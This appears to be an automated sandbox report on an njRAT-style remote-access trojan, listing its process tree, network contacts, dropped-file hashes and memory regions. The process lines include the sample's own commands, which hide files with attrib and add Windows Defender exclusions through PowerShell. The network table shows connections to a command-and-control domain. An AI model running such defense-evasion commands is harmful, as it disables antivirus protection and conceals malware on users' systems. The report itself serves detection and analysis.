"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --field-trial-handle=4352,i,12635696485982366971,14779254740013143694,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3236 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --field-trial-handle=5004,i,12635696485982366971,14779254740013143694,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5020 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --field-trial-handle=4664,i,12635696485982366971,14779254740013143694,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4988 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --field-trial-handle=4844,i,12635696485982366971,14779254740013143694,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4564 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --field-trial-handle=4784,i,12635696485982366971,14779254740013143694,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5016 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --field-trial-handle=5184,i,12635696485982366971,14779254740013143694,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5240 /prefetch:1
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --no-appcompat-clear --field-trial-handle=5316,i,12635696485982366971,14779254740013143694,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5324 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --no-appcompat-clear --field-trial-handle=5172,i,12635696485982366971,14779254740013143694,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5336 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=3240,i,12635696485982366971,14779254740013143694,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4952 /prefetch:8
C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
C:\Users\Admin\Downloads\1.exe
"C:\Users\Admin\Downloads\1.exe"
C:\Users\Admin\AppData\Local\Temp\BUILD45_PROTECTED.EXE
"C:\Users\Admin\AppData\Local\Temp\BUILD45_PROTECTED.EXE"
C:\Users\Admin\AppData\Local\Temp\SAVER.EXE
"C:\Users\Admin\AppData\Local\Temp\SAVER.EXE"
C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\9536.tmp\9537.tmp\9538.bat C:\Users\Admin\AppData\Local\Temp\SAVER.EXE"
C:\Windows\system32\attrib.exe
attrib +h +s C:\Users\Admin\AppData\Local\Temp\SAVER.EXE
C:\Windows\system32\attrib.exe
attrib +h +s +r C:\Windows\dllhost.exe
C:\Windows\system32\attrib.exe
attrib +h +s +r C:\Windows\dllhost.exe.config
C:\Windows\system32\attrib.exe
attrib +h +s +r C:\Users\C:\Users\Admin\AppData\RuntimeBroker.exe
C:\Windows\system32\attrib.exe
attrib +h +s +r C:\Users\C:\Users\Admin\AppData\RuntimeBroker.exe.config
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command Add-MpPreference -ExclusionExtension .exe
C:\Windows\SysWOW64\WindowsInput.exe
"C:\Windows\SysWOW64\WindowsInput.exe" --install
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command Add-MpPreference -ExclusionPath C:\Windows\System32\Microsoft\
C:\Windows\SysWOW64\WindowsInput.exe
"C:\Windows\SysWOW64\WindowsInput.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command Add-MpPreference -ExclusionPath C:\Windows\
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"powershell" Get-MpPreference -verbose
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command Add-MpPreference -ExclusionPath C:\Windows\System32\Microsoft\
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command Add-MpPreference -ExclusionProcess C:\Windows\dllhost.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command Add-MpPreference -ExclusionProcess C:\Windows\System32\Microsoft\dllhost.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command Add-MpPreference -ExclusionPath C:\Users\C:\Users\Admin\AppData\Roaming
C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\MiniSearchHost.exe
"C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\MiniSearchHost.exe" -ServerName:MiniSearchUI.AppXj3y73at8fy1htwztzxs68sxx1v7cksp7.mca
C:\Windows\dllhost.exe
"C:\Windows\dllhost.exe"
C:\Windows\dllhost.exe
C:\Windows\dllhost.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"powershell" Get-MpPreference -verbose
C:\Users\Admin\AppData\Roaming\RuntimeBroker.exe
"C:\Users\Admin\AppData\Roaming\RuntimeBroker.exe" /launchSelfAndExit "C:\Windows\dllhost.exe" 812 /protectFile
C:\Users\Admin\AppData\Roaming\RuntimeBroker.exe
"C:\Users\Admin\AppData\Roaming\RuntimeBroker.exe" /watchProcess "C:\Windows\dllhost.exe" 812 "/protectFile"
C:\Users\Admin\Downloads\1.exe
"C:\Users\Admin\Downloads\1.exe"
C:\Users\Admin\AppData\Local\Temp\BUILD45_PROTECTED.EXE
"C:\Users\Admin\AppData\Local\Temp\BUILD45_PROTECTED.EXE"
C:\Users\Admin\AppData\Local\Temp\SAVER.EXE
"C:\Users\Admin\AppData\Local\Temp\SAVER.EXE"
C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\2E0B.tmp\2E0C.tmp\2E0D.bat C:\Users\Admin\AppData\Local\Temp\SAVER.EXE"
C:\Windows\system32\attrib.exe
attrib +h +s C:\Users\Admin\AppData\Local\Temp\SAVER.EXE
C:\Windows\system32\attrib.exe
attrib +h +s +r C:\Windows\dllhost.exe
C:\Windows\system32\attrib.exe
attrib +h +s +r C:\Windows\dllhost.exe.config
C:\Windows\system32\attrib.exe
attrib +h +s +r C:\Users\C:\Users\Admin\AppData\RuntimeBroker.exe
C:\Windows\system32\attrib.exe
attrib +h +s +r C:\Users\C:\Users\Admin\AppData\RuntimeBroker.exe.config
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command Add-MpPreference -ExclusionExtension .exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command Add-MpPreference -ExclusionPath C:\Windows\System32\Microsoft\
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command Add-MpPreference -ExclusionPath C:\Windows\
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command Add-MpPreference -ExclusionPath C:\Windows\System32\Microsoft\
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command Add-MpPreference -ExclusionProcess C:\Windows\dllhost.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command Add-MpPreference -ExclusionProcess C:\Windows\System32\Microsoft\dllhost.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command Add-MpPreference -ExclusionPath C:\Users\C:\Users\Admin\AppData\Roaming
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --no-appcompat-clear --gpu-preferences=WAAAAAAAAADoAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAACEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=5444,i,12635696485982366971,14779254740013143694,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3500 /prefetch:8
C:\Windows\system32\BackgroundTransferHost.exe
"BackgroundTransferHost.exe" -ServerName:BackgroundTransferHost.13
C:\Windows\System32\Taskmgr.exe
"C:\Windows\System32\Taskmgr.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | njratnik667.hopto.org | udp |
| RU | 93.123.160.242:443 | njratnik667.hopto.org | tcp |
| US | 8.8.8.8:53 | 242.160.123.93.in-addr.arpa | udp |
| GB | 142.250.187.227:80 | www.gstatic.com | tcp |
| N/A | 224.0.0.251:5353 | udp | |
| RU | 93.123.160.242:443 | njratnik667.hopto.org | tcp |
| RU | 93.123.160.242:443 | njratnik667.hopto.org | tcp |
| RU | 93.123.160.242:443 | njratnik667.hopto.org | tcp |
| RU | 93.123.160.242:443 | njratnik667.hopto.org | tcp |
| RU | 93.123.160.242:443 | njratnik667.hopto.org | tcp |
| GB | 142.250.187.196:443 | www.google.com | tcp |
| GB | 142.250.187.196:443 | www.google.com | udp |
| GB | 142.250.180.10:443 | content-autofill.googleapis.com | tcp |
| RU | 93.123.160.242:443 | njratnik667.hopto.org | tcp |
| RU | 93.123.160.242:443 | njratnik667.hopto.org | tcp |
| RU | 93.123.160.242:443 | njratnik667.hopto.org | tcp |
| RU | 93.123.160.242:80 | njratnik667.hopto.org | tcp |
| RU | 93.123.160.242:80 | njratnik667.hopto.org | tcp |
| RU | 93.123.160.242:443 | njratnik667.hopto.org | tcp |
| RU | 93.123.160.242:443 | njratnik667.hopto.org | tcp |
| RU | 93.123.160.242:443 | njratnik667.hopto.org | tcp |
| RU | 93.123.160.242:443 | njratnik667.hopto.org | tcp |
| RU | 93.123.160.242:10134 | njratnik667.hopto.org | tcp |
| GB | 2.18.66.42:443 | tcp | |
| US | 95.100.153.187:443 | www.bing.com | tcp |
| US | 95.100.153.187:443 | www.bing.com | tcp |
| US | 95.100.153.187:443 | www.bing.com | tcp |
| US | 95.100.153.187:443 | www.bing.com | tcp |
| US | 95.100.153.187:443 | www.bing.com | tcp |
| US | 95.100.153.187:443 | www.bing.com | tcp |
| US | 52.182.143.210:443 | browser.pipe.aria.microsoft.com | tcp |
| US | 104.26.12.205:443 | api.ipify.org | tcp |
| DE | 216.58.206.67:443 | beacons.gcp.gvt2.com | tcp |
| US | 95.100.153.143:443 | www.bing.com | tcp |
| GB | 2.16.153.60:80 | tcp |
Files
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\SCT Auditing Pending Reports
| MD5 | d751713988987e9331980363e24189ce |
| SHA1 | 97d170e1550eee4afc0af065b78cda302a97674c |
| SHA256 | 4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945 |
| SHA512 | b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\BrowsingTopicsState
| MD5 | 939de3ac9196eddbf6cd24fbe419b141 |
| SHA1 | 8527dbc1cf34e3528a650dd21299509e78a68071 |
| SHA256 | d7b550dee3ff0be5126772a8058b6bfc6914a0caae1fa8e46abcdc3a0a2805e9 |
| SHA512 | 4b313754c6574cab1ce93540b8d625166c5c188a64e3dc13c2acb3ce66e5d0674163c20fe69b9adf9270a0e8aef90b3b1766ff7b9e8bdce4cfe028ea66c9f1e5 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State
| MD5 | 89ce38a1c90d9cee9d2418ecd9f50b29 |
| SHA1 | dfd73b02781ad0134ac6dc5c0b286c0c958e8a51 |
| SHA256 | 0952f8ac033da68d35027d023a7ddbc862ba43cd2212eed0e13cb904cb232eab |
| SHA512 | de9e1de35b8038c258db87e375ac250fe1dd22bcff179a988a9a426420643ae2faa2f2859bd2d88d5b8f97e523467aeae4d415ee889581eb81e8d1eb1ec8c598 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | dc9be0c24e872a8b7684f5962e040b25 |
| SHA1 | 20513e2c751eb88c7819c70278cbcc00dd1fd876 |
| SHA256 | 94c2b31a39b7c8002e8b577aced7fdebbe753f45777187065e1b5e2e0d434b13 |
| SHA512 | baec6da6bf80f7f63560143432bf0548e44fe6845e59da0bc41d957b6bf0034b773eb0380b769984b93ab25a7045a9be690ad46df8b20501ac7731084696d2e1 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | 11b0232f9acedb9b3b6d5208244df78a |
| SHA1 | 2639c0a18c048352d46708635227eeb36b6a81fb |
| SHA256 | 67c76300530272124399384f7d98287d90e661c45aa4b72e77a48fb94252cced |
| SHA512 | 240fdfc35a5cb695a9b0d4077326f58aa5c46d11191ff4b25fa13ab77fb315ea467f5baea9bf334a9872239bc799204b93dd46f8972692deaf857568b754cca3 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\Cache_Data\f_000005
| MD5 | d474ec7f8d58a66420b6daa0893a4874 |
| SHA1 | 4314642571493ba983748556d0e76ec6704da211 |
| SHA256 | 553a19b6f44f125d9594c02231e4217e9d74d92b7065dc996d92f1e53f6bcb69 |
| SHA512 | 344062d1be40db095abb7392b047b16f33ea3043158690cf66a2fa554aa2db79c4aa68de1308f1eddf6b9140b9ac5de70aad960b4e8e8b91f105213c4aace348 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\429983a4-0095-46a4-ba48-e0aceb7e852b.tmp
| MD5 | 55a2b9b8adb7c34804a2f551f11239fc |
| SHA1 | e73494b639ec6fab757238328e4a0ab66442dd61 |
| SHA256 | 1026dac48dd194d26916f34f44c6e7e494e0bfd0a0e513f3d5a2348cbf98cac4 |
| SHA512 | 1addd3dc31b26b7481e919a99f914ea55ebfce1a579b8ad083e79abf413dbab4adba75760797c880d7259a02881618a15c30c33e71b458ed966e5b3d0aa5a799 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | 187e1668726ce5a90aab8159d328d5fb |
| SHA1 | bff86c358419f006e128acd6a4b5aff8ff8fc1be |
| SHA256 | 5b6601f5276ea0d00d401ab2f214e0ad4517b101dd69820841497ea8bf2b1e8c |
| SHA512 | 70ab9088209d0d9f8354478f6767506d3bd632143c66ca92f52d749835c9d0dc42ffe8349338cb0d35f538f061986a2948cbc7344a568fd8eb62016abaef1161 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State
| MD5 | db2b9bf5c9c8e8143f82084d01b04349 |
| SHA1 | 7662673d7816512548c83210a2943ddc026d9dd1 |
| SHA256 | 3c56c3cb1d9c21f39bd81e2e0b6481db56c275e72efeaa79444b6415c1a9d266 |
| SHA512 | c196779d57c75a9244cf83cadebf7872358a8cf1ef09a0467726915a033d9057ac5390fc30f1c55458f194ab89a491df5d36c054b533aa1b53af864e7fefeedb |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\index-dir\temp-index
| MD5 | c01449ced81b1645296d2fd48ff81064 |
| SHA1 | cde58aa0dab73988d63d7fadd56073070d1e9dcf |
| SHA256 | e3dfef0d466225fd8d33d5020b77ca08863542461209c3063fed53176627835e |
| SHA512 | 0b7b05c718c318d6a89da4dabad9eb1ff133d0450228612faddd35f24993f46c98fa0d46f8fc3d1e68d389fef439e7ca22d3463bc4f7eaa6331cea1bb3361f85 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | 2344c68c3541e2f630936e84d0dcfa33 |
| SHA1 | aac39f7045fb061cc3c0e042df479ce8ac4a7375 |
| SHA256 | a7b3150c8fb70cc67d6088041bd084bfa72df2ab2119a3a1a653a88345aa9fc8 |
| SHA512 | 0d160edca3a20d735f235c5f06aa5dcc5ec3355103c30949c9017530a49c1d3050c870a2d06338c6b2cbd0df7170a29751f04b55405b49899285029b13927978 |
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | be6d4aa78f4ea77952121f05a23b35d0 |
| SHA1 | 7641ce4fcfd3fea589f6c321e49d123a47ed9740 |
| SHA256 | a2b0bfd2790690dd18ebc85442a02a3649fe1b9bd969a23ca2dcece477556a9d |
| SHA512 | abb52adbbb67e243ccb7c56406c38c5cc4dd6207ac1c22e7e49400e7bcb0b3f550a179afef7afa389bc3b8498b97c661665e916015a8dd7a64fec91bcd199eed |
C:\Users\Admin\Downloads\1.exe.crdownload
| MD5 | 6bd9fa3ef192a80e0fec426bedc752ec |
| SHA1 | 4decaa11b295b19927dec63f04102fca745e33f5 |
| SHA256 | 814336ac249fe8bd2b5700b3603c4f4ec095433d92e96ccf1d4ecd6968ad31f7 |
| SHA512 | da1bf9028fe8d369b0909e1395c62664cc4680e442e44cc739db0f8559b4ae3dc205fb5e948ecc3b6c10efd5c8fa57eefa648ec67ad131a6a486f4c9acf35937 |
C:\Users\Admin\Downloads\1.exe:Zone.Identifier
| MD5 | fbccf14d504b7b2dbcb5a5bda75bd93b |
| SHA1 | d59fc84cdd5217c6cf74785703655f78da6b582b |
| SHA256 | eacd09517ce90d34ba562171d15ac40d302f0e691b439f91be1b6406e25f5913 |
| SHA512 | aa1d2b1ea3c9de3ccadb319d4e3e3276a2f27dd1a5244fe72de2b6f94083dddc762480482c5c2e53f803cd9e3973ddefc68966f974e124307b5043e654443b98 |
C:\Users\Admin\AppData\Local\Temp\BUILD45_PROTECTED.EXE
| MD5 | fa60d5addf070e384e17e8947b93736f |
| SHA1 | 47231f098d39f0aa6af3d00367db661936a905a9 |
| SHA256 | 867ff47b1dfb1aceddc866b285de98b9b6174e22c83d772dd48502ad333fc4e6 |
| SHA512 | 88ba67b3d70f061b0fe14c89a6c8562450d3265a54981057c61bd325cd8aef595a66a2949f67a1f46d3f94a6a065eaaf81d3f4f0d543e5f871e96c7941f6166d |
C:\Users\Admin\AppData\Local\Temp\SAVER.EXE
| MD5 | 47a0e0b1f184a09c20aabdb3b7fd7d41 |
| SHA1 | cdf678618d5f6c3b24a994083280cbd7b9719d53 |
| SHA256 | 25ae495666d098744d9c5e0a0713358d9c4016052954679379f070aa253338ea |
| SHA512 | 405f43a56043f4301bbd9a196df9176008ac0ff84407401f5f7638542d90ad74d4be8ad6910333e79d47c6c9dd325ed1bf87c5c4dbd51ef33604539fc8ec1a56 |
memory/4112-165-0x0000000000850000-0x0000000000CA4000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\9536.tmp\9537.tmp\9538.bat
| MD5 | 38aa62eab695ee35b45640b38d81c6fb |
| SHA1 | dad805dd77f333f65f7b27164be6d84ae7f0f2a6 |
| SHA256 | a099bad93b0e8c3e2686c8877a12b14cec058144332a92562fb1f514afc2c588 |
| SHA512 | 628a74cd801a13a851dfef0866a604c1c57d764a12f852557efbb15f2d23de762b3cea9e8e0ff2c03bceda2aafc9a87c1f2f416ff286b49adb0f2493f5248ddf |
memory/4112-167-0x0000000000850000-0x0000000000CA4000-memory.dmp
memory/4112-168-0x0000000005B40000-0x0000000005B4E000-memory.dmp
memory/4112-169-0x0000000005BA0000-0x0000000005BFC000-memory.dmp
memory/8-175-0x000001F3BDB90000-0x000001F3BDBB2000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_jnvu1rca.wqi.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/4112-179-0x00000000061B0000-0x0000000006756000-memory.dmp
memory/4112-180-0x0000000005CF0000-0x0000000005D82000-memory.dmp
memory/4112-182-0x00000000060F0000-0x00000000060F8000-memory.dmp
memory/4112-183-0x0000000006100000-0x000000000610A000-memory.dmp
memory/4112-184-0x0000000006150000-0x0000000006172000-memory.dmp
memory/4112-181-0x00000000060E0000-0x00000000060F2000-memory.dmp
C:\Windows\SysWOW64\WindowsInput.exe
| MD5 | e6fcf516d8ed8d0d4427f86e08d0d435 |
| SHA1 | c7691731583ab7890086635cb7f3e4c22ca5e409 |
| SHA256 | 8dbe814359391ed6b0b5b182039008cf1d00964da9fbc4747f46242a95c24337 |
| SHA512 | c496cf8e2e222fe1e19051b291e6860f31aae39f54369c1c5e8c9758c4b56e8af904e3e536e743a0a6fdbbf8478afba4baee92e13fc1b3073376ac6bf4a7948e |
C:\Windows\SysWOW64\WindowsInput.exe.config
| MD5 | a2b76cea3a59fa9af5ea21ff68139c98 |
| SHA1 | 35d76475e6a54c168f536e30206578babff58274 |
| SHA256 | f99ef5bf79a7c43701877f0bb0b890591885bb0a3d605762647cc8ffbf10c839 |
| SHA512 | b52608b45153c489419228864ecbcb92be24c644d470818dfe15f8c7e661a7bcd034ea13ef401f2b84ad5c29a41c9b4c7d161cc33ae3ef71659bc2bca1a8c4ad |
memory/1452-201-0x0000000000E70000-0x0000000000E7C000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
| MD5 | 627073ee3ca9676911bee35548eff2b8 |
| SHA1 | 4c4b68c65e2cab9864b51167d710aa29ebdcff2e |
| SHA256 | 85b280a39fc31ba1e15fb06102a05b8405ff3b82feb181d4170f04e466dd647c |
| SHA512 | 3c5f6c03e253b83c57e8d6f0334187dbdcdf4fa549eecd36cbc1322dca6d3ca891dc6a019c49ec2eafb88f82d0434299c31e4dfaab123acb42e0546218f311fb |
memory/1452-210-0x00000000016D0000-0x00000000016E2000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 2e8eb51096d6f6781456fef7df731d97 |
| SHA1 | ec2aaf851a618fb43c3d040a13a71997c25bda43 |
| SHA256 | 96bfd9dd5883329927fe8c08b8956355a1a6ceb30ceeb5d4252b346df32bc864 |
| SHA512 | 0a73dc9a49f92d9dd556c2ca2e36761890b3538f355ee1f013e7cf648d8c4d065f28046cd4a167db3dea304d1fbcbcea68d11ce6e12a3f20f8b6c018a60422d2 |
memory/1452-211-0x000000001BB20000-0x000000001BB5C000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 050567a067ffea4eb40fe2eefebdc1ee |
| SHA1 | 6e1fb2c7a7976e0724c532449e97722787a00fec |
| SHA256 | 3952d5b543e5cb0cb84014f4ad9f5f1b7166f592d28640cbc3d914d0e6f41d2e |
| SHA512 | 341ad71ef7e850b10e229666312e4bca87a0ed9fe25ba4b0ab65661d5a0efa855db0592153106da07134d8fc2c6c0e44709bf38183c9a574a1fa543189971259 |
memory/1416-227-0x000000001A4B0000-0x000000001A5BA000-memory.dmp
memory/848-237-0x0000000005010000-0x0000000005046000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 781da0576417bf414dc558e5a315e2be |
| SHA1 | 215451c1e370be595f1c389f587efeaa93108b4c |
| SHA256 | 41a5aef8b0bbeea2766f40a7bba2c78322379f167c610f7055ccb69e7db030fe |
| SHA512 | 24e283aa30a2903ebe154dad49b26067a45e46fec57549ad080d3b9ec3f272044efaaed3822d067837f5521262192f466c47195ffe7f75f8c7c5dcf3159ea737 |
memory/848-242-0x0000000005700000-0x0000000005D2A000-memory.dmp
memory/848-244-0x0000000005D30000-0x0000000005D96000-memory.dmp
memory/848-245-0x0000000005DA0000-0x0000000005E06000-memory.dmp
memory/848-243-0x0000000005600000-0x0000000005622000-memory.dmp
memory/848-254-0x0000000005F90000-0x00000000062E7000-memory.dmp
memory/848-256-0x00000000064B0000-0x00000000064CE000-memory.dmp
memory/848-257-0x0000000006550000-0x000000000659C000-memory.dmp
memory/848-287-0x0000000006AA0000-0x0000000006AD4000-memory.dmp
memory/848-288-0x000000006FFE0000-0x000000007002C000-memory.dmp
memory/848-298-0x0000000006AE0000-0x0000000006AFE000-memory.dmp
memory/848-299-0x00000000076E0000-0x0000000007784000-memory.dmp
memory/848-300-0x0000000007E40000-0x00000000084BA000-memory.dmp
memory/848-301-0x00000000077F0000-0x000000000780A000-memory.dmp
memory/848-302-0x0000000007870000-0x000000000787A000-memory.dmp
memory/848-303-0x0000000007A80000-0x0000000007B16000-memory.dmp
memory/848-304-0x0000000007A00000-0x0000000007A11000-memory.dmp
memory/848-305-0x0000000007A30000-0x0000000007A3E000-memory.dmp
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences
| MD5 | 78b127dacb5c44f77f5235098fb8d4e3 |
| SHA1 | 741af58e15ea5197c2b82ee8865531171c69e336 |
| SHA256 | 1805f8040dcc8d2d9d1603f670319627d2ecb07c99201851d2a1f7969b7b042b |
| SHA512 | 6d690bc5eecbd5af8ec5751654f627a4a19036d7a21e6739bae80d86bfc86db99487a4da021ab63752fea22ef9d8b1425180badecac0cd90fea49b9669e9d036 |
memory/848-315-0x0000000007A40000-0x0000000007A55000-memory.dmp
memory/848-316-0x0000000007B40000-0x0000000007B5A000-memory.dmp
memory/848-317-0x0000000007B30000-0x0000000007B38000-memory.dmp
C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TempState\SearchHoverUnifiedTileModelCache.dat
| MD5 | 1e7dd00b69af4d51fb747a9f42c6cffa |
| SHA1 | 496cdb3187d75b73c0cd72c69cd8d42d3b97bca2 |
| SHA256 | bc7aec43a9afb0d07ef7e3b84b5d23a907b6baff367ecd4235a15432748f1771 |
| SHA512 | d5227d3df5513d7d0d7fb196eef014e54094c5ed8c5d31207b319e12480433f1424d49df759a7a2aefc6a69cef6bf2a0cc45d05660e618dc2ec9a2b082b7b5f7 |
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
| MD5 | 165d4f43209bffcd62e60929ee8b194f |
| SHA1 | e4786f8ed1ccefe22b07ed081aa0af44bfd59c90 |
| SHA256 | efabbdc19ad90ca4968d5b8a5ca8685ba3d2d8f3630df7201d1b5490eab4381b |
| SHA512 | d7c5e32c58e808ebe767b3a718e1af54413d94a235c15f374746dde59a6858e4c36b114d7b32c4fd82037130e204e7fbbd6d4adbd6ba373940cef04c4e17a2ec |
memory/812-339-0x0000000000F20000-0x0000000001374000-memory.dmp
memory/4112-341-0x0000000000850000-0x0000000000CA4000-memory.dmp
memory/812-343-0x0000000000F20000-0x0000000001374000-memory.dmp
memory/812-344-0x0000000000F20000-0x0000000001374000-memory.dmp
memory/812-345-0x0000000006850000-0x000000000689E000-memory.dmp
memory/812-346-0x0000000006E90000-0x0000000006EA8000-memory.dmp
memory/812-347-0x0000000007070000-0x0000000007088000-memory.dmp
memory/1264-350-0x0000000000F20000-0x0000000001374000-memory.dmp
memory/812-349-0x0000000007420000-0x00000000075E2000-memory.dmp
memory/812-351-0x0000000007250000-0x0000000007260000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
| MD5 | d0c46cad6c0778401e21910bd6b56b70 |
| SHA1 | 7be418951ea96326aca445b8dfe449b2bfa0dca6 |
| SHA256 | 9600b3fdf0565ccb49e21656aa4b24d7c18f776bfd04d9ee984b134707550f02 |
| SHA512 | 057531b468f7fbbb2175a696a8aab274dec0d17d9f71df309edcff35e064f3378050066a3df47ccd03048fac461594ec75e3d4fe64f9dd79949d129f51e02949 |
memory/1264-353-0x0000000000F20000-0x0000000001374000-memory.dmp
memory/1264-354-0x0000000000F20000-0x0000000001374000-memory.dmp
memory/1712-363-0x00000000055D0000-0x0000000005927000-memory.dmp
memory/1712-365-0x0000000006030000-0x000000000607C000-memory.dmp
